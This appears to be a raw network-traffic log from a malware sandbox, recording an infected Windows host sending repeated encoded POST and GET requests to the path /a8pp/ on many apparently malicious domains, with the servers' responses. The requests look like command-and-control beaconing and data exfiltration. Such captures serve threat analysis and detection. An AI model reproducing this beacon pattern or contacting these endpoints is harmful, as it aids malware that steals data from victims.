                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 44 4b 79 2f 69 6d 6c 4b 43 51 71 57 6f 51 36 66 32 73 69 62 53 35 59 54 70 73 4a 34 61 77 39 75 32 62 63 6c 37 36 4e 75 57 6c 52 51 2f 6a 2f 65 45 51 6c 51 52 6c 43 4c 53 61 75 79 4e 77 36 69 4f 2b 72 55 6a 46 75 4e 30 31 70 74 72 41 43 30 75 44 69 41 75 2b 71 37 51 6e 7a 48 5a 38 64 61 70 68 38 49 69 4c 57 6e 72 54 2b 55 61 49 4e 70 75 72 4b 64 50 61 37 77 6e 67 47 67 2b 30 37 52 72 6c 33 36 31 72 54 77 2f 37 62 74 43 33 64 4d 43 30 6e 42 65 55 4a 52 37 68 38 63 71 46 72 6f 74 41 4a 53 41 4a 6e 32 30 4b 4f 6b 30 49 79 46 61 71 59 38 71 42 50 54 5a 67 61 59 7a 41 39 4d 44 51 3d 3d
                                        Data Ascii: 2NlhHLS8=DKy/imlKCQqWoQ6f2sibS5YTpsJ4aw9u2bcl76NuWlRQ/j/eEQlQRlCLSauyNw6iO+rUjFuN01ptrAC0uDiAu+q7QnzHZ8daph8IiLWnrT+UaINpurKdPa7wngGg+07Rrl361rTw/7btC3dMC0nBeUJR7h8cqFrotAJSAJn20KOk0IyFaqY8qBPTZgaYzA9MDQ==
                                        Jun 4, 2024 14:40:36.031620026 CEST1176INHTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:40:35 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip
                                        Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 [TRUNCATED]
                                        Data Ascii: 3aeuT[oG~t{zmTBRSj8ZH(4A%j.hCF2TCZaw}X#,Pg+ hT&1DluG{=i8d}o9o W+u6m+rc}ebHeo,M {QhQ{<L"%cWXNBCm+`Txf`4 1\x*u^%qXK0d^0/V@"OuHa`:&L(LEzdDOZ}TCqB#sfd?85D*dP+U#XUnMOO]@kUN}x7"[=rWcse2}G."t-|25e]impb[r#f rGNqg05K1z}X"qphef7Gt^NW?Oz;{}:?Gk+F.v?NT]jtEv~ntr5HVFTkGoa};7}xG/7`=H[TV2!91Qw3nOM9SpI7b$?=6]_9Snvom?s:ZM+R*+?6gc&MW#Bk(A@8g) ^/\>U#W5CoUrBb>diNp}mmp=&xB:60


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        87192.168.11.3049881192.207.62.2180
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:40:38.550308943 CEST750OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 44 4b 79 2f 69 6d 6c 4b 43 51 71 57 36 67 4b 66 36 76 61 62 55 5a 59 51 30 63 4a 34 55 51 39 71 32 61 67 6c 37 37 34 72 57 57 6c 51 2f 43 50 65 57 55 52 51 57 6c 43 4c 4b 71 75 4e 44 51 37 73 4f 2b 58 32 6a 45 53 4e 30 31 56 74 72 45 4b 30 74 79 69 50 68 4f 71 31 66 48 7a 5a 47 73 64 61 70 68 38 49 69 4b 6e 43 72 53 57 55 5a 39 46 70 76 4b 4b 63 42 36 37 7a 76 41 47 67 36 30 36 57 72 6c 33 49 31 76 54 61 2f 35 6a 74 43 32 42 4d 46 6c 6e 4f 48 45 4a 58 6d 78 39 4d 75 46 4b 53 74 77 35 51 4d 65 61 74 7a 76 43 59 78 66 44 66 48 70 73 2b 35 68 7a 2b 46 68 33 77 78 43 38 58 65 53 58 2b 69 69 2f 58 49 48 66 51 42 36 32 4b 36 4f 72 6c 62 72 34 3d
                                        Data Ascii: 2NlhHLS8=DKy/imlKCQqW6gKf6vabUZYQ0cJ4UQ9q2agl774rWWlQ/CPeWURQWlCLKquNDQ7sO+X2jESN01VtrEK0tyiPhOq1fHzZGsdaph8IiKnCrSWUZ9FpvKKcB67zvAGg606Wrl3I1vTa/5jtC2BMFlnOHEJXmx9MuFKStw5QMeatzvCYxfDfHps+5hz+Fh3wxC8XeSX+ii/XIHfQB62K6Orlbr4=
                                        Jun 4, 2024 14:40:38.719877005 CEST1176INHTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:40:38 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip
                                        Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 [TRUNCATED]
                                        Data Ascii: 3aeuT[oG~t{zmTBRSj8ZH(4A%j.hCF2TCZaw}X#,Pg+ hT&1DluG{=i8d}o9o W+u6m+rc}ebHeo,M {QhQ{<L"%cWXNBCm+`Txf`4 1\x*u^%qXK0d^0/V@"OuHa`:&L(LEzdDOZ}TCqB#sfd?85D*dP+U#XUnMOO]@kUN}x7"[=rWcse2}G."t-|25e]impb[r#f rGNqg05K1z}X"qphef7Gt^NW?Oz;{}:?Gk+F.v?NT]jtEv~ntr5HVFTkGoa};7}xG/7`=H[TV2!91Qw3nOM9SpI7b$?=6]_9Snvom?s:ZM+R*+?6gc&MW#Bk(A@8g) ^/\>U#W5CoUrBb>diNp}mmp=&xB:60


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        88192.168.11.3049882192.207.62.2180
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:40:41.252587080 CEST1667OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 44 4b 79 2f 69 6d 6c 4b 43 51 71 57 36 67 4b 66 36 76 61 62 55 5a 59 51 30 63 4a 34 55 51 39 71 32 61 67 6c 37 37 34 72 57 58 64 51 2f 30 37 65 56 31 52 51 58 6c 43 4c 55 61 75 32 44 51 36 77 4f 2b 50 79 6a 45 65 7a 30 7a 5a 74 36 54 4b 30 6c 68 36 50 36 65 71 31 48 33 7a 59 5a 38 63 43 70 68 4d 55 69 4b 58 43 72 53 57 55 5a 38 31 70 71 72 4b 63 4d 61 37 77 6e 67 47 57 2b 30 36 79 72 6a 65 2f 31 76 57 74 2b 4a 44 74 44 57 52 4d 45 54 4c 4f 50 45 4a 56 6e 78 38 4a 75 46 47 33 74 77 6b 68 4d 65 48 4b 7a 6f 32 59 77 62 4f 5a 51 64 77 35 37 44 72 49 46 41 6e 4d 6c 30 6f 42 55 67 75 62 6e 79 6e 6f 43 33 66 61 4f 74 6d 48 6f 4f 58 38 48 37 54 36 4d 6d 2b 35 43 53 35 6b 62 7a 4a 30 46 6e 36 6c 4a 30 6c 37 46 41 57 39 2b 7a 52 74 38 64 79 61 37 59 55 71 4f 68 67 4b 79 4c 66 5a 55 38 65 72 35 36 59 46 72 55 56 51 49 4e 52 72 58 30 51 37 5a 53 6b 7a 31 67 53 42 4a 51 67 56 32 52 55 61 50 72 6e 76 4c 67 55 4a 36 6c 79 57 71 45 30 33 44 6c 76 48 71 74 6d 72 66 2b 49 4b 47 55 46 61 32 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=DKy/imlKCQqW6gKf6vabUZYQ0cJ4UQ9q2agl774rWXdQ/07eV1RQXlCLUau2DQ6wO+PyjEez0zZt6TK0lh6P6eq1H3zYZ8cCphMUiKXCrSWUZ81pqrKcMa7wngGW+06yrje/1vWt+JDtDWRMETLOPEJVnx8JuFG3twkhMeHKzo2YwbOZQdw57DrIFAnMl0oBUgubnynoC3faOtmHoOX8H7T6Mm+5CS5kbzJ0Fn6lJ0l7FAW9+zRt8dya7YUqOhgKyLfZU8er56YFrUVQINRrX0Q7ZSkz1gSBJQgV2RUaPrnvLgUJ6lyWqE03DlvHqtmrf+IKGUFa24usjKqqgJ1x32izMKWVyHuba1XrY63vt0bXh5dCuKVJ6FKY6GL6xJiNQnaJq04bgf+iE+DnFEqAhQVWLmqle87hDyuC9qpsXEfBm2x117ElwviC7QE/hYV5gI1PYlyJAkm2X07xlvZJDNMgGxDVcMYyvVwPTLVBe2MMAFGkM6JopY9PbzvFXcQN8c2Q0PiGGCJCz8nNMsudiWOFnmWEcJjxKAO/RG1am+j752HSnAhvWAduDyItHGz8ZVgLpFyHwD5gZB/mXqp3zeZkdt+1v6pQjpN37WGjvm6Yds/qoDhhR5gAUb5IfAPRBo/x6DDmBNEOa9Bj2ER/ftAH9+1lQn28Q9Db+d90sHo/WhfetNNOnz7prWUAFJOACj7UVVWj744fHm/V+bo9SWHHGu+eWmeyuloff6l9mZRwbWVnCkluR3jd1d4Zx7xyghbDanMfeUWVSlUWH2WWRfDSWMcY4cnvw6gzy/P6NbeGlkMdZt4VFAQEpPD/f92G0EOnuqKSk1eu42IY8mHU4YRmLjYfpZ209n7cD+/0yEYTI67HXhumSOfTxdep08cK/YDJ8WtfqAVN4o8uRINgo45Ig7iXDuIrCXrLbEesN3r4MRELgtBxMN5QvGY07YyYsQXMe93U7+gPbjhQQcL/JEjaLoiULC7oG9uwnHvHeq/ [TRUNCATED]
                                        Jun 4, 2024 14:40:41.424671888 CEST1176INHTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:40:41 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip
                                        Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 [TRUNCATED]
                                        Data Ascii: 3aeuT[oG~t{zmTBRSj8ZH(4A%j.hCF2TCZaw}X#,Pg+ hT&1DluG{=i8d}o9o W+u6m+rc}ebHeo,M {QhQ{<L"%cWXNBCm+`Txf`4 1\x*u^%qXK0d^0/V@"OuHa`:&L(LEzdDOZ}TCqB#sfd?85D*dP+U#XUnMOO]@kUN}x7"[=rWcse2}G."t-|25e]impb[r#f rGNqg05K1z}X"qphef7Gt^NW?Oz;{}:?Gk+F.v?NT]jtEv~ntr5HVFTkGoa};7}xG/7`=H[TV2!91Qw3nOM9SpI7b$?=6]_9Snvom?s:ZM+R*+?6gc&MW#Bk(A@8g) ^/\>U#W5CoUrBb>diNp}mmp=&xB:60


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        89192.168.11.3049883192.207.62.2180
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:40:43.956228018 CEST460OUTGET /a8pp/?2NlhHLS8=OIafhQlqd3+U0X685uCjXpA/yYYLTXRf5vcl7I4tT0pe2zvQLHkCRhCjRsaaEiaqAczN9yym/x5p7g+8tSCureiRSn+8K4wSoicHodjwuTrKVPMbvJXSPao=&80k=Qv4d HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:40:44.124578953 CEST1289INHTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:40:44 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Data Raw: 35 66 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 34 34 34 7d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 e5 ae 8b e4 bd 93 22 7d 0a 2e 6d 61 69 6e 7b 77 69 64 74 68 3a 36 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 7d 0a 2e 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 61 35 33 61 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c [TRUNCATED]
                                        Data Ascii: 5fb<!doctype html><html><head><meta charset="utf-8"><title></title><style>*{margin:0;padding:0;color:#444}body{font-size:14px;font-family:""}.main{width:600px;margin:10% auto;}.title{background: #20a53a;color: #fff;font-size: 16px;height: 40px;line-height: 40px;padding-left: 20px;}.content{background-color:#f3f7f9; height:280px;border:1px dashed #c6d9b6;padding:20px}.t1{border-bottom: 1px dashed #c6d9b6;color: #ff4000;font-weight: bold; margin: 0 0 20px; padding-bottom: 18px;}.t2{margin-bottom:8px; font-weight:bold}ol{margin:0 0 20px 22px;padding:0;}ol li{line-height:30px}</style></head><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KPvSogiWixBEEhWI",ck:"KPvSogiWixBEEhWI"})</script><body><div class="main"><div class="title"></div><div class="content"><p class="t1"></p><p class="t2"> [TRUNCATED]
                                        Jun 4, 2024 14:40:44.124620914 CEST447INData Raw: 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 32 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5 86 b3 ef bc 9a 3c 2f 70 3e 0a 09 09 09 3c 6f 6c 3e 0a 09 09 09 09 3c 6c 69 3e e6 a3 80 e6 9f a5 e6 8f 90 e4 ba a4 e5 86 85 e5 ae b9 ef bc 9b 3c 2f 6c 69 3e 0a
                                        Data Ascii: ><p class="t2"></p><ol><li></li><li></li><li></li></ol></div></div></body><scrip
                                        Jun 4, 2024 14:40:44.124635935 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        90192.168.11.304988891.195.240.1980
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:41:09.241153002 CEST466OUTGET /a8pp/?2NlhHLS8=/NPZ6ym1eSqP6E/qwOmQvYjKsz7zkRsccrcByesNZAVEstX0SolnWK8jgzxt8MISaNzEdIb6rnMbXZkqzFIAORFEfuZ8IH0a3kCasVRTZJxsOlTMl/y3o9s=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.peptily.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:09.465466022 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        91192.168.11.304988934.120.137.4180
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:41:14.601763010 CEST474OUTGET /a8pp/?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:14.747421980 CEST606INHTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:41:14 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                        Via: 1.1 google
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        92192.168.11.3049890160.124.114.18880
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:41:20.072335958 CEST475OUTGET /a8pp/?2NlhHLS8=Dft4chLLB7HQRgI1kvQb3UGdiigcwJaJso3MJc+IJoTJW0I2amM0Xj+YeLw4jIoNvtXY/7GemIMI+dXc5vnp9QE1cggkijBoQvQelzZ8ig3DEoIcGDshdqY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:20.382594109 CEST355INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:41:20 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Data Raw: 61 33 0d 0a 3c 74 69 74 6c 65 3e c9 cf c3 c5 d4 bc c5 c4 c1 aa cf b5 b7 bd ca bd 2d b8 bd bd fc b5 e7 bb b0 d6 b1 bd d3 d4 bc b0 ae 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: a3<title>-</title><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><script src="/js.js"></script>0


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        93192.168.11.304989191.195.240.1980
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:41:25.629314899 CEST478OUTGET /a8pp/?2NlhHLS8=eXj7agnwQ7UtDQTI2/QeRjNOKmxKRYHEwlq+kXNt3DleoKuUYGucHmIzSo9PpxNipdSpHjsdoNiIZ3Hh69GYDO27Wp3lPM6WDcDlV706K5XwonPjk8UKoRY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:25.855757952 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        94192.168.11.3049892172.67.205.5680
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:41:31.000834942 CEST475OUTGET /a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:31.206630945 CEST962INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:41:31 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
